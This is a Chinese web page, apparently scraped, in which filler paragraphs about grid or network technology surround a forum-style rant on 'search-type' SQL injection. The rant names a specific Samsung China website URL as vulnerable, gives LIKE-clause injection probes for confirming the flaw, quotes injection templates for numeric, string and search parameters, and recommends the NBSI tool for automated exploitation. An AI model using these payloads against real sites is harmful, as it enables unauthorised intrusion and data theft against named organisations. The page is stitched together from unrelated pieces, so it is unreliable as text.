|
網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 我不這么認為,注入就是注入,哪里有分什么搜索型?看官們覺得新奇的地方就是他們用普通的注入探測,很多軟體不能搜索到注入點而已!今天看到 黑客基地 有個關于搜索型注入的文章,用到的是勇哥的技術,借此機會我來發發牢騷。 他探測的是三星:http://notebook.samsung.com.cn/index.aspx 注入方式是: 一般網站的搜索都是部分匹配的 有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC= 構造注入語句 三星%'and 1=1 and '%'=' 三星%'and 1=2 and '%'=' 大家看到了吧 兩個返回頁面是不一樣的 說明有注入的漏洞 特征字 寫 筆記本 就是三星%'and 1=1 and '%'=' 返回時有的 我們知道一般搜索代碼是這么寫的: Select * from 表名 where 字段 like ’%關鍵字%’ 這樣就造成了對關鍵字前后的所有匹配(%是用來全部匹配的) 這里如果關鍵字沒有過濾的話,就可以這樣來構造: 關鍵字=’ and [查詢條件] and ‘%25’=’ 這樣查詢就變成 select * from 表名 where 字段 like '%' and 1=1 and '%'='%' 這樣就很好的構成了一個sql注入點,當然用手工也可以,用nbsi也可以~~ 注入是不分家的,沒必要什么型什么型的!~ 如果不信,大家請看下面的《sql注入天書》的原話 第一節、SQL注入的一般步驟 首先,判斷環境,尋找注入點,判斷數據庫類型,這在入門篇已經講過了。 其次,根據注入參數類型,在腦海中重構SQL語句的原貌,按參數類型主要分為下面三種: (A) ID=49 這類注入的參數是數字型,SQL語句原貌大致如下: Select * from 表名 where 字段=49 注入的參數為ID=49 And [查詢條件],即是生成語句: Select * from 表名 where 字段=49 And [查詢條件] (B) Class=連續劇 這類注入的參數是字符型,SQL語句原貌大致概如下: Select * from 表名 where 字段=’連續劇’ 注入的參數為Class=連續劇’ and [查詢條件] and ‘’=’ ,即是生成語句: Select * from 表名 where 字段=’連續劇’ and [查詢條件] and ‘’=’’ (C) 搜索時沒過濾參數的,如keyword=關鍵字,SQL語句原貌大致如下: Select * from 表名 where 字段like ’%關鍵字%’ 注入的參數為keyword=’ and [查詢條件] and ‘%25’=’, 即是生成語句: Select * from 表名 where字段like ’%’ and [查詢條件] and ‘%’=’%’ 當然手工是麻煩的 用工具的話,我建議用nbsi的工具比較好,就我感覺只有nbsi結合了這個技術,用別的軟體是不能注入的 注入點只要寫: http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC=% 再加個特征字符就可以了 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!
本站發布的Win7純凈版系統、Win10純凈版和XP純凈版系統僅為個人學習測試使用,請在下載后24小時內刪除,不得用于任何商業用途,否則后果自負,請支持購買微軟正版軟件!
本站所有資源全部來自于網絡資源,如侵犯到您的權益,請及時通知我們(),我們會及時處理.
Copyright © 2018-2020 蘿卜系統 手機站 關于本站
